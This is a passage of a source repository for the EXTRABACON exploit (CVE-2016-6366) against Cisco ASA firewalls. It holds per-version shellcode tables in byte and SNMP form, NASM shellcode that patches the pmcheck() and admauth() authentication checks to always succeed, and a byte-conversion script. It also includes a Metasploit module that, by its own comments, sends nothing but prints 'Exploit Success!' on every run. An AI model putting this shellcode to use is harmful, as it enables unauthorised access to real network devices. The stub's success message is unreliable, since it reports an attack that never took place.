"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\xc4\xbc\x09\x50\xb8\xe5\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.196.188.9.80.184.229.96.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x65\xf1\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xd0\xcf\x54\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.101.241.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.208.207.84.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xd0\xcf\x54\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x65\xf1\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.208.207.84.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.101.241.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xd0\x17\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.208.23.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = 
"\xeb\x14\xbf\xd0\x17\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.208.23.8.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa844.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa844" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x6f\xc6\xa1\x09" 11 | 12 | my_ret_addr_snmp = "111.198.161.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x10\xcc\x47\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x48\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.16.204.71.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xe8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | 
launcher_snmp = "139.132.36.232.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x65\xf0\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\xc9\x55\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.101.240.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.201.85.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = 
"\xeb\x14\xbf\xf0\xc9\x55\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x65\xf0\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.201.85.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.101.240.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xb0\x1b\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.176.27.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\xb0\x1b\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.176.27.8.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /metasploit/cisco_asa_snmpoverflow.rb: 
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'

# Skeleton module: as written, every method in this file only emits log
# lines. No connection is opened, no SNMP packet is built or sent, and
# the reported result does not depend on any response from a target.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Mixed in but not used here: nothing in this file calls connect/sock.
  include Msf::Exploit::Remote::Tcp

  # Register module metadata with the framework.
  #
  # @param info [Hash] framework-supplied module info merged via update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco ASA SNMP Overflow (EXTRABACON)',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Cisco ASA, related
        to the EXTRABACON exploit. Instead of patching authentication
        functions, this allows for direct access to a Linux shell (which
        is more privileged than the normal Cisco shell).
      },
      'Author'         => [ 'Sean Dillon ' ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'linux',
      'References'     =>
        [
          [ 'CVE', '2016-6366'],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],
          [ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],
        ],
      'Privileged'     => true,
      'License'        => MSF_LICENSE,
      'Payload'        =>
        {
          # Declared payload budget only; no staging logic exists in this file.
          'Space'    => 1000, # we can break this up into multiple stages
        },
      'Targets'        =>
        [
          # Single hard-coded target entry. Nothing in this file reads the
          # 'Ret' value (target.ret is never referenced below).
          [ '9.2(1)', { 'Ret' => 0xbfffa5d8 } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 13 2016'
    ))

    # No module-specific options are registered.
    register_options(
      [
      ],
      self.class
    )
  end

  # Log a progress line for a byte range. The arguments are used only to
  # format the message; no data is transmitted.
  #
  # @param start [Integer] first byte index of the range (for the message)
  # @param stop  [Integer] last byte index of the range (for the message)
  # @param total [Integer] total byte count (for the message)
  def send_bytes(start, stop, total)
    print_status("Sending initial payload bytes (#{start}-#{stop} of #{total})...")
  end

  # Framework entry point. Walks three fixed ranges (0-33, 33-66, 66-100 of
  # a 100-byte total) through send_bytes, then reports success
  # unconditionally: there is no network I/O and no check that anything
  # happened, so print_good runs on every invocation.
  def exploit
    print_status("Sending memory-write packet...")
    send_bytes(0, 33, 100)
    send_bytes(33, 66, 100)
    send_bytes(66, 100, 100)
    print_status("Calling payload...")
    print_good("Exploit Success!")
  end

end
-------------------------------------------------------------------------------- /shellcode/clean.nasm: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | SAFERET_OFFSET equ 0x11111111 ; where to continue execution 4 | FIX_EBP equ 0x48 ; this is 0x58 in versions before 8.4(1) 5 | FIX_EDI equ 0x0f0f0f0b ; seems static? 6 | FIX_EBX equ 0x10 ; seems static? 7 | 8 | _start: 9 | ; these are registers we have to clean up, so we can null them before save 10 | xor ebx, ebx 11 | xor esi, esi 12 | xor ecx, ecx ; ecx is volatile register 13 | xor eax, eax 14 | 15 | pusha ; save all registers 16 | 17 | 18 | popa ; restore all registers 19 | 20 | push SAFERET_OFFSET ; push the safe return address 21 | 22 | ; these registers are pre-xored 23 | add bl, FIX_EBX 24 | mov edi, FIX_EDI 25 | 26 | mov ebp, esp 27 | add ebp, FIX_EBP 28 | 29 | ret ; return to safe address 30 | 31 | -------------------------------------------------------------------------------- /shellcode/egg.nasm: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | SAFERET_OFFSET equ 0x11111111 ; where to continue execution 4 | FIX_EBP equ 0x48 ; this is 0x58 in versions before 8.4(1) 5 | FIX_EDI equ 0x0f0f0f0b ; seems static? 6 | FIX_EBX equ 0x10 ; seems static? 
7 | 8 | _start: 9 | ; these are registers we have to clean up, so we can null them before save 10 | xor ebx, ebx 11 | xor esi, esi 12 | xor ecx, ecx ; ecx is volatile register 13 | xor eax, eax 14 | 15 | pusha ; save all registers 16 | 17 | ; fork, have parent return cleanly 18 | add al, 0x2 19 | int 0x80 20 | test eax, eax 21 | jz _egghunter 22 | 23 | popa ; restore all registers 24 | 25 | push SAFERET_OFFSET ; push the safe return address 26 | 27 | ; these registers are pre-xored 28 | add bl, FIX_EBX 29 | mov edi, FIX_EDI 30 | 31 | mov ebp, esp 32 | add ebp, FIX_EBP 33 | 34 | ret ; return to safe address 35 | 36 | _egghunter: 37 | mov ecx, esp 38 | xor cx, cx 39 | -------------------------------------------------------------------------------- /shellcode/genshellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import sys 4 | import binascii 5 | 6 | data = open(sys.argv[1], "rb").read() 7 | hex = [] 8 | for c in data: 9 | hex.append(binascii.hexlify(c)) 10 | 11 | print "\\x" + "\\x".join(hex) 12 | print 13 | 14 | str = "" 15 | for c in hex: 16 | str += "%d." % int(c, 16) 17 | 18 | print str[:-1] 19 | -------------------------------------------------------------------------------- /shellcode/shellcode.nasm: -------------------------------------------------------------------------------- 1 | ; 2 | ; Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (75 bytes) 3 | ; 4 | ; Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com) 5 | ; License: http://opensource.org/licenses/MIT 6 | ; Release Date: September 15, 2016 7 | ; 8 | ; Author: Sean Dillon (PGP: 2E3C8D72353C9B8C9FF797E753EC4C9876D5727B) 9 | ; 10 | ; Description: 11 | ; This is not the same shellcode as the Equation Group version, 12 | ; but accomplishes the same task of disabling the auth functions 13 | ; in less stages/bytes. 
Particularly, it is 75 bytes in one stage 14 | ; instead of 200+ bytes spread across 2 stages. 15 | ; 16 | ; Build/Run: 17 | ; 1) $ nasm shelldisable.nasm 18 | ; 19 | ; Note: The offsets given are for 9.2(3), not part of the original release 20 | ; 21 | BITS 32 22 | 23 | ; comment this out to generate the pass-enable shellcode 24 | %define MODE_PASS_DISABLE 25 | 26 | SAFERET_OFFSET equ 0x9277386 ; where to continue execution 27 | PMCHECK_BOUNDS equ 0x9b78000 ; mprotect for pmcheck() 28 | PMCHECK_OFFSET equ 0x9b78010 ; location of pmcheck() 29 | ADMAUTH_BOUNDS equ 0x8085000 ; page align for admauth() 30 | ADMAUTH_OFFSET equ 0x8085a40 ; location of admauth() 31 | 32 | ; we must patch pmcheck() and admauth() to always return true 33 | ; xor eax, eax = 31 c0 34 | ; inc eax = 40 35 | ; ret = c3 36 | 37 | PATCHED_CODE equ 0xc340c031 ; gotta love endianess 38 | PMCHECK_CODE equ 0x89c03155 ; the original bytes at pmcheck() 39 | ADMAUTH_CODE equ 0x57e58955 ; the original bytes at admauth() 40 | 41 | %ifdef MODE_PASS_DISABLE 42 | %define PMCHECK_BYTES PATCHED_CODE 43 | %define ADMAUTH_BYTES PATCHED_CODE 44 | %else 45 | %define PMCHECK_BYTES PMCHECK_CODE 46 | %define ADMAUTH_BYTES ADMAUTH_CODE 47 | %endif 48 | 49 | ; we need to fix the function frame to continue normal operation 50 | ; eax = 0x0 51 | ; esi = 0x0 52 | ; edi = 0x0b 53 | ; ebx = 0x10 54 | ; ebp = [esp - 0x4 (ret)] + 0x?? 55 | FIX_EBP equ 0x48 ; this is 0x58 in versions before 8.4(1) 56 | FIX_EDI equ 0x0f0f0f0b ; seems static? 57 | FIX_EBX equ 0x10 ; seems static? 
58 | 59 | _start: 60 | 61 | ; these are registers we have to clean up, so we can null them before save 62 | xor ebx, ebx 63 | xor esi, esi 64 | xor ecx, ecx ; ecx is volatile register 65 | xor eax, eax 66 | 67 | pusha ; save all registers 68 | 69 | xor edx, edx 70 | 71 | add ch, 0x10 ; ecx = 0x1000 72 | add dl, 0x7 ; edx = 0x7 73 | add al, 0x7d ; eax = 0x7d 74 | 75 | push eax ; save eax for second call 76 | 77 | mov ebx, PMCHECK_BOUNDS ; ebx = byte boundary for mprotect 78 | 79 | int 0x80 ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7) 80 | 81 | pop eax ; eax = 0x7d 82 | mov ebx, ADMAUTH_BOUNDS ; second function page align 83 | 84 | int 0x80 ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7) 85 | 86 | mov dword [PMCHECK_OFFSET], PMCHECK_BYTES ; write patch code to both functions 87 | mov dword [ADMAUTH_OFFSET], ADMAUTH_BYTES 88 | 89 | popa ; restore all registers 90 | 91 | push SAFERET_OFFSET ; push the safe return address 92 | 93 | ; these registers are pre-xored 94 | add bl, FIX_EBX 95 | mov edi, FIX_EDI 96 | 97 | mov ebp, esp 98 | add ebp, FIX_EBP 99 | 100 | ret ; return to safe address 101 | -------------------------------------------------------------------------------- /shellcode/writebytes.nasm: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | SAFERET_OFFSET equ 0x9277386 ; where to continue execution 4 | 5 | ; we need to fix the function frame to continue normal operation 6 | ; eax = 0x0 7 | ; esi = 0x0 8 | ; edi = 0x0b 9 | ; ebx = 0x10 10 | ; ebp = [esp - 0x4 (ret)] + 0x?? 11 | FIX_EBP equ 0x48 ; this is 0x58 in versions before 8.4(1) 12 | FIX_EDI equ 0x0f0f0f0b ; seems static? 13 | FIX_EBX equ 0x10 ; seems static? 
14 | 15 | _start: 16 | 17 | ; these are registers we have to clean up, so we can null them before save 18 | xor ebx, ebx 19 | xor esi, esi 20 | xor ecx, ecx ; ecx is volatile register 21 | xor eax, eax 22 | 23 | ; we can just take stack offset instead of jmp/call/pop/rep 24 | mov esi, esp ; lea esi, [esp + _bytes_to_write - 4] 25 | add esi, 0xff ; change 0xff to distance of _bytes_to_write - 4 26 | 27 | 28 | add cl, 0xff ; change 0xff to 82 - shellcode_size 29 | mov edi, 0xffffffff ; destination for this round 30 | rep movsb ; write until ecx == 0 31 | 32 | 33 | ; these registers are pre-xored 34 | add bl, FIX_EBX 35 | mov edi, FIX_EDI 36 | 37 | lea ebp, [esp + FIX_EBP - 4] 38 | 39 | jmp SAFERET_OFFSET ; return to safe address 40 | 41 | _bytes_to_write: 42 | ; store patch bytes here 43 | --------------------------------------------------------------------------------